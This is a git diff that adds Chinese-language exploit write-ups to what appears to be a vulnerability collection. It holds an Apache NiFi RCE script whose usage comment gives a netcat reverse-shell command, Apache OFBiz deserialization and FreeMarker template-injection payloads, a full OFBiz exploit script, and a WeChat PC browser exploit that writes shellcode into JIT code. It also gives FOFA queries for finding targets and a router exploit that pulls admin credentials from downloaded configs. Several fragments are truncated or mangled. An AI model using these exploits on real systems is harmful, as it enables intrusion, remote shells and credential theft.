+ res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
+ return res.json()
+
+ def fetch_process_group(self):
+ url = self.url + "/nifi-api/process-groups/root"
+ try:
+ res = req.get(url=url, verify=False)
+ data = res.json()["id"]
+ return data
+ except Exception as e:
+ pass
+ return 0
+
+ def create_process(self, process_group_id):
+ url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
+ data = {
+ 'component': {
+ 'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
+ },
+ 'revision': {
+ 'version': 0
+ }
+ }
+ headers = {
+ "Content-Type": "application/json",
+ }
+ try:
+ res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
+ return res.json()["id"]
+ except Exception as e:
+ pass
+ return 0
+
+
+if __name__ == '__main__':
+ if len(sys.argv) != 3:
+ print("rce.py url cmd")
+ else:
+ url = sys.argv[1] # http://192.168.1.1:8080
+ cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
+ e = Exp(url)
+ e.exploit(cmd)
+
+```
+
+msf模块:
+
+https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt
\ No newline at end of file
diff --git a/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md b/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md
new file mode 100644
index 0000000..c1591dc
--- /dev/null
+++ b/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md
@@ -0,0 +1,51 @@
+# Apache OFBiz RMI Bypass RCE CVE-2021-29200
+
+## 漏洞描述
+
+由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。
+
+参考链接:
+
+- https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
+- https://xz.aliyun.com/t/9556
+
+## 漏洞影响
+
+```
+Apache OFBiz < 17.12.07
+```
+
+## 漏洞复现
+
+poc:
+
+```
+POST /webtools/control/SOAPService HTTP/1.1
+Host: xxx
+User-Agent: python-requests/2.24.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: text/xml
+Content-Length: 877
+
+
+
+
+
+
+
+
+
+ ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078
+
+
+
+
+
+
+
+
+
+```
+
diff --git a/其他漏洞/微信客户端 远程命令执行漏洞.md b/其他漏洞/微信客户端 远程命令执行漏洞.md
new file mode 100644
index 0000000..fc693f9
--- /dev/null
+++ b/其他漏洞/微信客户端 远程命令执行漏洞.md
@@ -0,0 +1,196 @@
+# 微信客户端 远程命令执行漏洞
+
+## 漏洞描述
+
+微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。
+
+参考链接:
+
+- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ
+
+## 漏洞影响
+
+```
+微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41
+```
+
+## 漏洞复现
+
+[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链:
+
+1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。
+2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。
+3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。
+
+exploit.js:
+
+```
+ENABLE_LOG = true;
+IN_WORKER = true;
+
+// run calc and hang in a loop
+var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的
+
+function print(data) {
+}
+
+
+var not_optimised_out = 0;
+var target_function = (function (value) {
+ if (value == 0xdecaf0) {
+ not_optimised_out += 1;
+ }
+ not_optimised_out += 1;
+ not_optimised_out |= 0xff;
+ not_optimised_out *= 12;
+});
+
+for (var i = 0; i < 0x10000; ++i) {
+ target_function(i);
+}
+
+
+var g_array;
+var tDerivedNCount = 17 * 87481 - 8;
+var tDerivedNDepth = 19 * 19;
+
+function cb(flag) {
+ if (flag == true) {
+ return;
+ }
+ g_array = new Array(0);
+ g_array[0] = 0x1dbabe * 2;
+ return 'c01db33f';
+}
+
+function gc() {
+ for (var i = 0; i < 0x10000; ++i) {
+ new String();
+ }
+}
+
+function oobAccess() {
+ var this_ = this;
+ this.buffer = null;
+ this.buffer_view = null;
+
+ this.page_buffer = null;
+ this.page_view = null;
+
+ this.prevent_opt = [];
+
+ var kSlotOffset = 0x1f;
+ var kBackingStoreOffset = 0xf;
+
+ class LeakArrayBuffer extends ArrayBuffer {
+ constructor() {
+ super(0x1000);
+ this.slot = this;
+ }
+ }
+
+ this.page_buffer = new LeakArrayBuffer();
+ this.page_view = new DataView(this.page_buffer);
+
+ new RegExp({ toString: function () { return 'a' } });
+ cb(true);
+
+ class DerivedBase extends RegExp {
+ constructor() {
+ // var array = null;
+ super(
+ // at this point, the 4-byte allocation for the JSRegExp `this` object
+ // has just happened.
+ {
+ toString: cb
+ }, 'g'
+ // now the runtime JSRegExp constructor is called, corrupting the
+ // JSArray.
+ );
+
+ // this allocation will now directly follow the FixedArray allocation
+ // made for `this.data`, which is where `array.elements` points to.
+ this_.buffer = new ArrayBuffer(0x80);
+ g_array[8] = this_.page_buffer;
+ }
+ }
+
+ // try{
+ var derived_n = eval(`(function derived_n(i) {
+ if (i == 0) {
+ return DerivedBase;
+ }
+
+ class DerivedN extends derived_n(i-1) {
+ constructor() {
+ super();
+ return;
+ ${"this.a=0;".repeat(tDerivedNCount)}
+ }
+ }
+
+ return DerivedN;
+ })`);
+
+ gc();
+
+
+ new (derived_n(tDerivedNDepth))();
+
+ this.buffer_view = new DataView(this.buffer);
+ this.leakPtr = function (obj) {
+ this.page_buffer.slot = obj;
+ return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
+ }
+
+ this.setPtr = function (addr) {
+ this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
+ }
+
+ this.read32 = function (addr) {
+ this.setPtr(addr);
+ return this.page_view.getUint32(0, true, ...this.prevent_opt);
+ }
+
+ this.write32 = function (addr, value) {
+ this.setPtr(addr);
+ this.page_view.setUint32(0, value, true, ...this.prevent_opt);
+ }
+
+ this.write8 = function (addr, value) {
+ this.setPtr(addr);
+ this.page_view.setUint8(0, value, ...this.prevent_opt);
+ }
+
+ this.setBytes = function (addr, content) {
+ for (var i = 0; i < content.length; i++) {
+ this.write8(addr + i, content[i]);
+ }
+ }
+ return this;
+}
+
+function trigger() {
+ var oob = oobAccess();
+
+ var func_ptr = oob.leakPtr(target_function);
+ print('[*] target_function at 0x' + func_ptr.toString(16));
+
+ var kCodeInsOffset = 0x1b;
+
+ var code_addr = oob.read32(func_ptr + kCodeInsOffset);
+ print('[*] code_addr at 0x' + code_addr.toString(16));
+
+ oob.setBytes(code_addr, shellcode);
+
+ target_function(0);
+}
+
+try{
+ print("start running");
+ trigger();
+}catch(e){
+ print(e);
+}
+```
+
diff --git a/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md b/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md
new file mode 100644
index 0000000..f7ffbec
--- /dev/null
+++ b/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md
@@ -0,0 +1,158 @@
+# Apache OFBiz 反序列化 CVE-2021-30128
+
+## 漏洞描述
+
+Ofbiz(Open for business)是一个开源的,基于J2EE和XML规范的,用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架(Framework)。
+
+参考链接:
+
+- 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
+- r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
+- https://github.com/r0ckysec/CVE-2021-30128
+- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
+
+## 漏洞影响
+
+```
+Apache OFBiz < 17.12.07
+```
+
+## FOFA
+
+```
+app="Apache_OFBiz"
+```
+
+## 漏洞复现
+
+poc:
+
+```
+POST /webtools/control/SOAPService HTTP/1.1
+Host: 192.168.80.145:8443
+User-Agent: python-requests/2.24.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: text/xml
+Content-Length: 6093
+
+
+
+
+
+
+
+
+ ACED0005 ... ... 871007E000D78
+
+
+
+
+
+
+
+
+
+```
+
+exp:
+
+
+```py
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+"""
+@Author: r0cky
+@Time: 2021/3/24-15:09
+"""
+import subprocess
+import sys
+
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def banner():
+ print("""
+===================================================
+ ____ ______ ____ _ ________ _______
+ / __ \| ____| _ \(_) | ____\ \ / / __ \
+ | | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
+ | | | | __| | _ <| |_ / | __| > < | ___/
+ | |__| | | | |_) | |/ / | |____ / . \| |
+ \____/|_| |____/|_/___| |______/_/ \_\_|
+
+ CVE-2021-30128 Powered by r0cky
+===================================================
+ """)
+
+def bypass(payload):
+ className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl']
+
+ for cn in className:
+ len_hex = hex(len(cn)).replace('0x','').upper()
+ className_hex = cn.encode().hex().upper()
+
+ bypass_className = cn + '
+
+
+
+
+
+
+ {}
+
+
+
+
+
+
+
+
+
+ """.format(post_data)
+ print("[+] payload sending...")
+ r = requests.post(url, data=data, headers=headers, verify=False)
+ if r.status_code == 200:
+ print("[+] send payload success.")
+ print()
+ print("[END] Apache OFBiz RCE Done.")
+ else:
+ print("[-] send payload failed.")
+ print()
+ print("[END] Apache OFBiz RCE failed.")
+
+headers={"Content-Type": "text/xml"}
+
+if __name__ == '__main__':
+ banner()
+ try:
+ target = sys.argv[1]
+ cmd = sys.argv[2]
+ # target = "https://192.168.80.136:8443"
+ # vps_ip = "10.20.28.16"
+ # vps_port = "9999"
+ url = "{}/webtools/control/SOAPService".format(target)
+ exp(url, cmd)
+ except:
+ print("Example: \n\tpython3 " + sys.argv[0] + " \n")
+
+```
diff --git a/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md b/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md
new file mode 100644
index 0000000..7325180
--- /dev/null
+++ b/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md
@@ -0,0 +1,34 @@
+# Apache OfBiz 服务器端模板注入 SSTI
+
+## 漏洞描述
+
+Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
+
+参考链接:
+
+- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
+
+## 漏洞影响
+
+```
+Apache OfBiz 17.12.01
+```
+
+## FOFA
+
+```
+app="Apache_OFBiz"
+```
+
+## 漏洞复现
+
+服务器端模板注入 renderLookupField
+
+从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
+
+poc:
+
+```
+https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
+```
+
diff --git a/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md b/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
new file mode 100644
index 0000000..66866dc
--- /dev/null
+++ b/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
@@ -0,0 +1,24 @@
+# Apache OfBiz 远程代码执行 RCE
+
+## 漏洞描述
+
+Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
+
+参考链接:
+
+- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
+
+## FOFA
+
+```
+app="Apache_OFBiz"
+```
+
+## 漏洞复现
+
+poc:
+
+```
+https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}> bitindex))
+
+ for nextbit in buts_arr:
+ offset = (offset + 1) % 8
+ if ignore > 0:
+ ignore = ignore - 1
+ continue
+ bits.append(nextbit)
+ if len(bits) == pointwidth:
+ cp_int = 0
+ lsb_first = [b for b in bits]
+ lsb_first.reverse()
+ for bit_index in range(len(lsb_first)):
+ if lsb_first[bit_index]:
+ cp_int = cp_int | (1 << bit_index)
+
+ bits = []
+ codepoints_arr.append(cp_int)
+ codesize = codesize + 1
+ if cp_int in [CLEAR_CODE, END_OF_CODE]:
+ codesize = init_csize
+ pointwidth = minwidth
+ else:
+ while codesize >= (2 ** pointwidth):
+ pointwidth = pointwidth + 1
+ if cp_int == END_OF_CODE:
+ ignore = (8 - offset) % 8
+
+
+ decodedBytes = []
+ for cp_int in codepoints_arr:
+
+ suffix = ""
+ if cp_int == CLEAR_CODE:
+ _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
+ _cp_dict[CLEAR_CODE] = CLEAR_CODE
+ _cp_dict[END_OF_CODE] = END_OF_CODE
+ prefix = None
+
+ elif cp_int != END_OF_CODE:
+ if cp_int in _cp_dict:
+ suffix = _cp_dict[cp_int]
+ if None != prefix:
+ _cp_dict[len(_cp_dict)] = prefix + suffix[0]
+ else:
+ suffix = prefix + prefix[0]
+ _cp_dict[len(_cp_dict)] = suffix
+ prefix = suffix
+ decoded = suffix
+ for char in decoded:
+ decodedBytes.append(char)
+ return decodedBytes
+
+
+
+
+
+
+def exploit(ip):
+ print "[!] Downloading config"
+ try:
+ r = requests.get("http://{}/goform/getimage".format(ip))
+ pass
+ except:
+ print "[-] Failed to download the config, the target may not be vulnerable"
+
+ BIN_CONTENT = r.content
+ BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50]
+
+ CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT))
+
+ USER_, PASS_ = "", ""
+ for i in ADMIN_LOG_CFG.keys():
+ if i in CONFIG_XML:
+ CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]
+ PASS_ = CONFIG_XML[:CONFIG_XML.index('